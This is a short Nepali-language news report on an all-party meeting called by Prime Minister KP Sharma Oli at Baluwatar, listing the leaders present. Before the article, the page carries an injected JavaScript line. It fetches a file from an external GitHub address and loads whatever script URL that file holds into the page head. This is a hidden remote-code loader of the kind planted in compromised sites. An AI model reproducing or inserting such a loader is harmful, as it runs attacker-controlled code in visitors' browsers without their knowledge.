;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
मंसिर २३,
काठमाडौं । प्रधानमन्त्री केपी शर्मा ओलीले डाकेको सर्वदलिय बैठक अहिले बालुवाटारमा जारी छ ।
बैठकमा संघीय संसदमा प्रतिनिधित्व गर्ने सबै दलको सहभागिता रहेको छ । बैठकमा राजाबादीहरुको पछिल्लो समयमा चर्किएको पर्दशनसहितका ऐजेन्णडामा छलफल भैरहेको स्रोतले बतायो ।
बैठकमा प्रधानमन्त्री ओलीसहित नेकपा अध्यक्ष पुष्पकमल दाहाल प्रचण्ड, वरिष्ठ नेता माधव कुमार नेपाल, झलनाथ खनाल, उपाध्यक्ष वामदेव गौतम, कांग्रेसको तर्फबाट सभापति शेरबहादुर देउवा, वरिष्ठ नेता रामचन्द्र पौडेल, नेता कृष्ण सिटौला, सहमहामन्त्री डा प्रकाशशरण महत,नेमकिपाको तर्फबाट प्रेम सुवाल, जनता समाजवादी पार्टीका तर्फबाट उपेन्द्र यादवलगायतको सहभागिता रहेको छ ।
फेसबुक प्रतिक्रियाहरु